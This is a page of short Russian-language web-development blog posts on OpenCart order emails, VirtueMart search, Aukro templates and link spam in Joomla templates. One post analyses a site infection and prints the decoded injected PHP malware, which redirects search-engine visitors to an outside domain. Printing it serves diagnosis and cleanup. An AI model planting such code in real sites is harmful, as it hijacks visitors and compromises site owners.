Веб сайты

OpenCart (ocSrote) полноценное письмо о заказе администратору

18.12.2014 10:45 Администратор
Печать PDF

При заказе OpenCart (ocSrote) присылает администратору уведомление о заказе с довольно скудным содержимым. Администратор должен зайти в админку и уже там увидить все необходимые данные о заказе: ФИО покупателя, номер телефона, количество товара и тп.

Есть простое решение, которое позволяет отправить администратору  сообщение идентичное  тому, которое отправляется покупателю. Для этого:

 

Поиск VirtueMart 2 убирает тире или дефис "-" запятую "," точку "." а также "/"

18.12.2014 10:35 Администратор
Печать PDF

Joomla 2.5, Virtuemart 2.x

В поиске Virtuemart невозможно найти товар, название которого содержит точку, дефис и др. знаки.

Обновлено ( 18.12.2014 10:45 )
 

Вирусы на сайте. k.human-e.net, Backdoor.PHP.Pioneer.a, heur:Trojan.Script.Generic

01.07.2013 22:42 Администратор
Печать PDF


Вирусы на сайте. k.human-e.net, Backdoor.PHP.Pioneer.a, heur:Trojan.Script.GenericЗаражены два сайта. Один на Joomal 2.5, другой на WordPress. Оба сайта лежат на одном хостинг-аккаунте. Вредоносный скрипт внедрен во все php файлы по одному или несколько раз:

Расшифрованный он выглядит так:

error_reporting(0); $qazplm=headers_sent(); if (!$qazplm){ $referer=$_SERVER['HTTP_REFERER']; $uag=$_SERVER['HTTP_USER_AGENT']; if ($uag) { if (!stristr($uag,"MSIE 7.0") and !stristr($uag,"MSIE 6.0")){ if (stristr($referer,"yahoo") or stristr($referer,"bing") or stristr($referer,"rambler") or stristr($referer,"webalta") or stristr($referer,"bit.ly") or stristr($referer,"tinyurl.com") or preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/",$referer) or preg_match ("/google\.(.*?)\/url\?sa/",$referer) or stristr($referer,"facebook.com/l") or stristr($referer,"aol.com")) { if (!stristr($referer,"cache") and !stristr($referer,"inurl") and !stristr($referer,"EeYp3D7")){ header("Location: http://oeprfa.ddns.me.uk/"); exit(); } } } } }

Обновлено ( 01.07.2013 23:50 )
 

Шаблоны Aukro. Панель лотов бесплатно.

02.12.2013 11:02 Администратор
Печать PDF

шаблоны аукроНемного информации по крупнейшему интернет-аукциону Аукро. В данной статье мы попытаемся поднять тему оптимизации процесса продаж, юзабильности, удобства ознакомления покупателя с лотами продавца.

Aukro.ua – крупнейший всеукраинский интернет-аукцион, который делает возможным покупку и продажу любого товара 24 часа в сутки, 7 дней в неделю, в удобное для Вас время, в удобном для Вас месте. Покупать и продавать на интернет-аукционе Aukro.ua можно везде, где есть интернет - на работе и дома, в гостинице и в кафе.

Для чего нужны шаблоны на Аukro?

Шаблон - это готовый "скелет" описания лота - код HTML, в который встроен одинаковый текст в описание. Шаблоны помогают продавцам экономить время и создавать привлекательные описания лотов.

Аukro шаблоны
Во время выставления лота на продажу пользователь может выбрать один из шаблонов, предложенных Aukro. Шаблоны Aukro помогают пользователям, которые не знакомы с HTML, создать красочное описание лота.

Шаблоны, подготовленные пользователем 

Продавец может подготовить собственный шаблон описания лота. Такой шаблон поможет создать "скелет" описания однотипных лотов. Чтобы создать собственный шаблон, пользователь должен владеть элементарными знаниями HTML. Создав собственный шаблон, продавец сделает лоты узнаваемыми по характерному стилю описания. Можно создать до 10 собственных шаблонов. Чтобы создать шаблон, нужно перейти на страницу Мой Aukro > Мои продажи > Установки продаж> Шаблоны

Безусловно, тот продавец, который пользуется шаблонами, выигрывает по количеству продаж перед теми кто не использует эту возможность. Но с какими трудностями сталкивается продавец? Безусловно, это создание шаблона, внедрение шаблона в интернет-аукцион, настройка нужных ссылок и добавление панели лотов. Для выполнения этих действий необходимы базовые либо глубокие знания HTML.

Каким образом использовать шаблоны в Aukro без знаний HTML?

Обновлено ( 28.04.2015 18:32 )
 

Шаблоны Joomla с левыми ссылками. Очистка

09.03.2013 10:45 Администратор
Печать PDF

Поговорим про левые ссылки в шаблонах Joomla.  Как правило, в любой качественный платный шаблон выложенный в свободном доступе  внедряется код содержащий ссылки на левые сайты. Ссылки могут быть в видимых блоках, могут быть в невидимых, могут быть в блоках которые смещены вправо или влево на несколько тысяч пикселей.

Последнее время способы внедрения и маскировки ссылок становятся все изощреннее.

Обновлено ( 04.11.2013 09:24 )
 

Страница 4 из 10

<< Первая < Предыдущая 1 2 3 4 5 6 7 8 9 10 Следующая > Последняя >>
| + - | RTL - LTR